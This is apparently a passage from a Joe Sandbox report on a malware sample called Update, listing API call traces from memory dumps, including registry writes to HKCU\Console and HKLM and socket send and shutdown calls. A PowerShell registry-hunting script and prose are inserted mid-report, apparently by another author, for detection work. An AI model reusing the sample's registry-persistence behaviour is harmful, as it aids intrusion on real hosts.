                                                                                            • __lock.LIBCMT ref: 034F3D73
                                                                                              • Part of subcall function 034F8E5B: __mtinitlocknum.LIBCMT ref: 034F8E71
                                                                                              • Part of subcall function 034F8E5B: __amsg_exit.LIBCMT ref: 034F8E7D
                                                                                              • Part of subcall function 034F8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,034F3F06,0000000D,03506340,00000008,034F3FFF,00000000,?,034F10F0,00000000,03506278,00000008,034F1155,?), ref: 034F8E85
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 034F3D80
                                                                                            • __lock.LIBCMT ref: 034F3D94
                                                                                            • ___addlocaleref.LIBCMT ref: 034F3DB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                            • String ID: KERNEL32.DLL
                                                                                            • API String ID: 637971194-2576044830
                                                                                            • Opcode ID: 6d63d715c96db29e8a7a51f26a0045581c721f9b8698cc01a8856756da45d7c7
                                                                                            • Instruction ID: 9a7fd6fe82a4a5c2b33156c552bfe8bcf63bc814990aff38122c008c32a5b128
                                                                                            • Opcode Fuzzy Hash: 6d63d715c96db29e8a7a51f26a0045581c721f9b8698cc01a8856756da45d7c7
                                                                                            • Instruction Fuzzy Hash: E9016D79541701EED720EFAAD80474ABBE0AF40318F14890ED59A9F3B0CBB5A645CB19
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 034EB7A7
                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 034EB7B7
                                                                                            • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 034EB7CE
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000004), ref: 034EB7D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Value$CloseDeleteOpen
                                                                                            • String ID: Console$IpDatespecial
                                                                                            • API String ID: 3183427449-1840232981
                                                                                            • Opcode ID: 27a2d78ea4fe5af06866af4b84970d91411264425fbbd61fcdc8579206676ea6
                                                                                            • Instruction ID: 5e1de5283c609ed6c18f4f3ace1cfb24cd6e2c844fa077f6f4e769cddc576795
                                                                                            • Opcode Fuzzy Hash: 27a2d78ea4fe5af06866af4b84970d91411264425fbbd61fcdc8579206676ea6
                                                                                            • Instruction Fuzzy Hash: 78F02731344340FFE3249760AD9FF1AB754FB89704F104E0DFB80650C08262E009DA16
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 0350031D
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 0350032E
                                                                                            • __getptd.LIBCMT ref: 0350033C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: MOC$RCC$csm
                                                                                            • API String ID: 803148776-2671469338
                                                                                            • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                            • Instruction ID: 01367feb7dd4234a33e8bb23bc8faa5630395f3d234e2b3ad0f47e5c9f8d908e
                                                                                            • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                            • Instruction Fuzzy Hash: BBE01A38504204CFC760EB79D08ABA837D9BF48618F5D04A6D90CCF2B2C739E4908996
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 00915A3C
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C36
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C57
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915ADB
                                                                                              • Part of subcall function 00911257: __CxxThrowException@8.LIBCMT ref: 00911267
                                                                                              • Part of subcall function 00911257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00911278
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00915CC8
                                                                                            • timeGetTime.WINMM ref: 00915CCE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 2093779962-0
                                                                                            • Opcode ID: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                                            • Instruction ID: 291950dc8edb94031133a09f1ea710b66532e70436e530c4a9d0b9aa28af938d
                                                                                            • Opcode Fuzzy Hash: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                                            • Instruction Fuzzy Hash: E8A1E7B0A01A5AAFE314DF6AC8C4796FBA8FB49304F50462EE12DC7640D775A964CF90
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 00915A3C
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C36
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C57
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915ADB
                                                                                              • Part of subcall function 00911257: __CxxThrowException@8.LIBCMT ref: 00911267
                                                                                              • Part of subcall function 00911257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00911278
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00915CC8
                                                                                            • timeGetTime.WINMM ref: 00915CCE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 2093779962-0
                                                                                            • Opcode ID: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                                            • Instruction ID: 42f5c972a12216f4458da436a225cac432fbf79fb0531e3f2c1951f0242a829d
                                                                                            • Opcode Fuzzy Hash: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                                            • Instruction Fuzzy Hash: 1FA1E7B0A01A5AEFD314DF6AC8C4796FBA8FB49304F50462EE12DC7640D775A964CF90
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 00915359
                                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 00915369
                                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 00915387
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00915392
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 009153F2
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0091540B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                                            • String ID:
                                                                                            • API String ID: 4289506047-0
                                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction ID: ae031d2e630e9d761622f5d88dbe4b36c2d8b1df3250a6360236a047c4cbf61b
                                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction Fuzzy Hash: 25410431744B48DBD315DB308C84FFA7BA5AB95384F5B4859E5A2DB182E3B0D882CB91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 034E9C3F
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034E9C63
                                                                                            • _memset.LIBCMT ref: 034E9CBB
                                                                                              • Part of subcall function 034EA610: GetObjectW.GDI32(?,00000054,?), ref: 034EA62E
                                                                                            • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 034E9CD3
                                                                                            • _free.LIBCMT ref: 034E9CE4
                                                                                            • _free.LIBCMT ref: 034E9D23
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                            • String ID:
                                                                                            • API String ID: 1756752955-0
                                                                                            • Opcode ID: 9fd1b779244625c888b91064b5c4eae533f663bbb763986d678708273e2e19e9
                                                                                            • Instruction ID: 93c68376b0fcd0d5e59dc5574d6c5320b94c307e68b299043c4313d06c8895e2
                                                                                            • Opcode Fuzzy Hash: 9fd1b779244625c888b91064b5c4eae533f663bbb763986d678708273e2e19e9
                                                                                            • Instruction Fuzzy Hash: 3831ADB26003166BE700EE6AD880B57B7E8BB49211F04853BD9098F390E7B5E455CB99
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00915081
                                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,100191B0,?,?,10014228,000000FF), ref: 00915099
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009150A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4082018349-0
                                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                            • Instruction ID: 490a6ec0642b0ed84e596a7af9f8c4e73e8afbaa056885cf56e7c8f489e0dfc3
                                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                            • Instruction Fuzzy Hash: BC317076B04648EBE711CF94DC86BAAB3E8FB89711F01851AF916C7780D776E850CB50
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 034E50CA
                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 034E50E2
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 034E50EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4082018349-0
                                                                                            • Opcode ID: bf61b6800f9f771163710924409b9fc8e996591ad9d9d6ca044cd76b36dd1066
                                                                                            • Instruction ID: 9185783cafe917eb0b9306005a20404129db24c84ffcb7a561cdae873a323666
                                                                                            • Opcode Fuzzy Hash: bf61b6800f9f771163710924409b9fc8e996591ad9d9d6ca044cd76b36dd1066
                                                                                            • Instruction Fuzzy Hash: 4C31AE7AA04708AFD720DFA5D945F6BB3A8EB49719F00499EF915CB780D736E800CB54
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 00915359
                                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 00915369
                                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 00915387
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00915392
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 009153F2
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0091540B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                                            • String ID:
                                                                                            • API String ID: 4289506047-0
                                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction ID: 741d45cd750f9becae838d8900c70ed27e602efef355ff3bf7c4ad311d82959c
                                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction Fuzzy Hash: 1031C230348B88DBE716CF308844FB97BB5AB99344F5F4899E1959B142C3B0D8C2CB51
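                                                                                            The two registry sequences listed in the entries above are the host artifacts worth checking after this sample runs. The first opens HKEY_CURRENT_USER (0x80000001)\Console with access 0x2 (KEY_SET_VALUE), deletes the value IpDatespecial and rewrites it as type 3 (REG_BINARY) with 4 bytes of data. The second opens a key under HKEY_LOCAL_MACHINE (0x80000002) with access 0x102 (KEY_SET_VALUE | KEY_WOW64_64KEY, i.e. the 64-bit view from a 32-bit process) and does the same delete-then-set of a REG_BINARY value of 0x12A0 (4768) bytes; its key and value names are only the unresolved pointers 10017554 and 10017568 in this dump, so they are not known from the report. The PowerShell below is an added hunt example, not code from the Joe Sandbox report or from the sample: the first function checks the fully resolved HKCU artifact, the second sweeps a hive subtree for REG_BINARY values of exactly 0x12A0 bytes because that size is the only resolved fact about the HKLM write. The sweep root (HKLM:\SOFTWARE), the depth and the function names are assumptions.

```powershell
# Added hunt example; not code from the Joe Sandbox report or from the sample.
# Checks for the two registry artifacts implied by the RegOpenKeyExW/RegDeleteValueW/RegSetValueExW
# sequences in the report. Root, depth and function names are assumptions.

# (1) HKCU\Console value "IpDatespecial": RegOpenKeyExW(HKEY_CURRENT_USER, "Console", 0, KEY_SET_VALUE),
#     RegDeleteValueW, RegSetValueExW(..., REG_BINARY, cbData = 4). Console is a legitimate key that
#     normally holds REG_DWORD/REG_SZ console settings, so a 4-byte REG_BINARY value with this name stands out.
function Test-IpDatespecialValue {
    param(
        [string]$KeyPath   = 'HKCU:\Console',
        [string]$ValueName = 'IpDatespecial'
    )
    $key = Get-Item -LiteralPath $KeyPath -ErrorAction SilentlyContinue
    if (-not $key -or $key.GetValueNames() -notcontains $ValueName) { return $null }   # clean host: nothing to report
    $data = $key.GetValue($ValueName)
    [pscustomobject]@{
        Key    = $key.Name
        Name   = $ValueName
        Kind   = $key.GetValueKind($ValueName)          # expect Binary (REG_BINARY = 3) if this sample wrote it
        Length = if ($data -is [byte[]]) { $data.Length } else { $null }
        Hex    = if ($data -is [byte[]]) { ($data | ForEach-Object { $_.ToString('x2') }) -join '' } else { [string]$data }
    }
}

# (2) HKLM write with access 0x102 (KEY_SET_VALUE | KEY_WOW64_64KEY), REG_BINARY, cbData = 0x12A0 (4768 bytes).
#     The key and value names are unresolved pointers (10017554 / 10017568) in the dump, so this sweep keys
#     off the blob size only. The default root and depth are assumptions; widen them if nothing is found.
function Find-BinaryValuesOfSize {
    param(
        [string]$Root = 'HKLM:\SOFTWARE',
        [int]$Size    = 0x12A0,
        [int]$Depth   = 3
    )
    $keys = @(Get-Item -LiteralPath $Root -ErrorAction SilentlyContinue) +
            @(Get-ChildItem -LiteralPath $Root -Recurse -Depth $Depth -ErrorAction SilentlyContinue)
    foreach ($k in $keys) {
        if (-not $k) { continue }
        foreach ($name in $k.GetValueNames()) {
            if ($k.GetValueKind($name) -ne [Microsoft.Win32.RegistryValueKind]::Binary) { continue }
            $data = $k.GetValue($name)
            if ($data -is [byte[]] -and $data.Length -eq $Size) {
                [pscustomobject]@{ Key = $k.Name; Name = $name; Length = $data.Length }
            }
        }
    }
}

Test-IpDatespecialValue
Find-BinaryValuesOfSize
```

                                                                                            Run it from a 64-bit PowerShell (5.0 or later, for Get-ChildItem -Depth) so that the view inspected is the one the sample selected with KEY_WOW64_64KEY. Test-IpDatespecialValue returns $null on a host that does not have the value; a hit from Find-BinaryValuesOfSize is a size match only and must be confirmed by looking at the key it reports, since the report does not resolve the key or value name and any 4768-byte REG_BINARY value will match.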
                                                                                            APIs
                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6C399DC2
                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6C39A03B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 2673424686-393685449
                                                                                            • Opcode ID: 6a27b7eb8ec2d9acfb1a4450fd8bfa0a4692859d28e34977cae2b6b9654e01b0
                                                                                            • Instruction ID: bb38649c85e41eacb6db7d620f44491a7f8dd6e3dfd0c1201b944c03ce2ff82d
                                                                                            • Opcode Fuzzy Hash: 6a27b7eb8ec2d9acfb1a4450fd8bfa0a4692859d28e34977cae2b6b9654e01b0
                                                                                            • Instruction Fuzzy Hash: 8DB17971C01309EFCF04CFA5C980A9EB7B4FF0431AB14415AE85A6BA15E336DA55CF92
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 035005D6
                                                                                              • Part of subcall function 035000B7: __getptd.LIBCMT ref: 035000C5
                                                                                              • Part of subcall function 035000B7: __getptd.LIBCMT ref: 035000D3
                                                                                            • __getptd.LIBCMT ref: 035005E0
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 035005EE
                                                                                            • __getptd.LIBCMT ref: 035005FC
                                                                                            • __getptd.LIBCMT ref: 03500607
                                                                                            • _CallCatchBlock2.LIBCMT ref: 0350062D
                                                                                              • Part of subcall function 0350015C: __CallSettingFrame@12.LIBCMT ref: 035001A8
                                                                                              • Part of subcall function 035006D4: __getptd.LIBCMT ref: 035006E3
                                                                                              • Part of subcall function 035006D4: __getptd.LIBCMT ref: 035006F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: e6880ea9d2efce5e2bbe9c213c86caad5aeceb6eef7add1038b19f9db71d0b5b
                                                                                            • Instruction ID: 3827f0bb9839fda2256696d43f15b7e0c75fb78904dc8503c35dc74a96c77a27
                                                                                            • Opcode Fuzzy Hash: e6880ea9d2efce5e2bbe9c213c86caad5aeceb6eef7add1038b19f9db71d0b5b
                                                                                            • Instruction Fuzzy Hash: 1411F975D0030ADFDB00EFA5D444B9E77B0FF44314F14806AE925AF290DB3999119F54
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 0305FF95
                                                                                              • Part of subcall function 0305FA76: __getptd.LIBCMT ref: 0305FA84
                                                                                              • Part of subcall function 0305FA76: __getptd.LIBCMT ref: 0305FA92
                                                                                            • __getptd.LIBCMT ref: 0305FF9F
                                                                                              • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
                                                                                              • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
                                                                                            • __getptd.LIBCMT ref: 0305FFAD
                                                                                            • __getptd.LIBCMT ref: 0305FFBB
                                                                                            • __getptd.LIBCMT ref: 0305FFC6
                                                                                            • _CallCatchBlock2.LIBCMT ref: 0305FFEC
                                                                                              • Part of subcall function 0305FB1B: __CallSettingFrame@12.LIBCMT ref: 0305FB67
                                                                                              • Part of subcall function 03060093: __getptd.LIBCMT ref: 030600A2
                                                                                              • Part of subcall function 03060093: __getptd.LIBCMT ref: 030600B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                            • Instruction ID: c6e49802c3982dd374259593b60911f3a407eb3022e2d73c0e93e9763e7b9b22
                                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                            • Instruction Fuzzy Hash: 8211C6B9D01309DFDB04EFA4D844BEEBBB1FF48310F1084A9E814AB250DB399A159F50
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 034F4891
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __amsg_exit.LIBCMT ref: 034F48B1
                                                                                            • __lock.LIBCMT ref: 034F48C1
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 034F48DE
                                                                                            • _free.LIBCMT ref: 034F48F1
                                                                                            • InterlockedIncrement.KERNEL32(03612830), ref: 034F4909
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 3470314060-0
                                                                                            • Opcode ID: c6415059b5956f7703cd403ceb6133ec0c7a387c898442496587f65e28799cb1
                                                                                            • Instruction ID: 4e8061daf00ff1eac5031093c4a15ac376f57eade3aeb5ea530a217b464a537a
                                                                                            • Opcode Fuzzy Hash: c6415059b5956f7703cd403ceb6133ec0c7a387c898442496587f65e28799cb1
                                                                                            • Instruction Fuzzy Hash: 2A016139A017529FD720EB6A9404B5FB3A0BF04724F0C400BEA14AF3A4CF345546DBD9
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(?), ref: 034E9BD2
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BE3
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BF8
                                                                                            • GdiplusShutdown.GDIPLUS(00000000,?,?,?,034E9B7B), ref: 034E9C04
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C15
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C1C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                            • String ID:
                                                                                            • API String ID: 4268643673-0
                                                                                            • Opcode ID: 04bf901989f9fa4772e06a8bcd670040df8298f17b23ad76a16306c8b499e44e
                                                                                            • Instruction ID: 69667a63420a284da298d17439bd9462411e6690ab665527d0bdc45b19dc4c17
                                                                                            • Opcode Fuzzy Hash: 04bf901989f9fa4772e06a8bcd670040df8298f17b23ad76a16306c8b499e44e
                                                                                            • Instruction Fuzzy Hash: 5C0112B1900305EFC714FF66A994815BBA4FB49219324856EE118CA2A6C377C407DF94
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E48E1
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 034E48EC
                                                                                            • Sleep.KERNEL32(00000258), ref: 034E48F9
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E4914
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E491D
                                                                                            • Sleep.KERNEL32(0000012C), ref: 034E492E
                                                                                              • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
                                                                                              • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
                                                                                              • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
                                                                                              • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
                                                                                              • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
                                                                                              • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
                                                                                              • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                            • String ID:
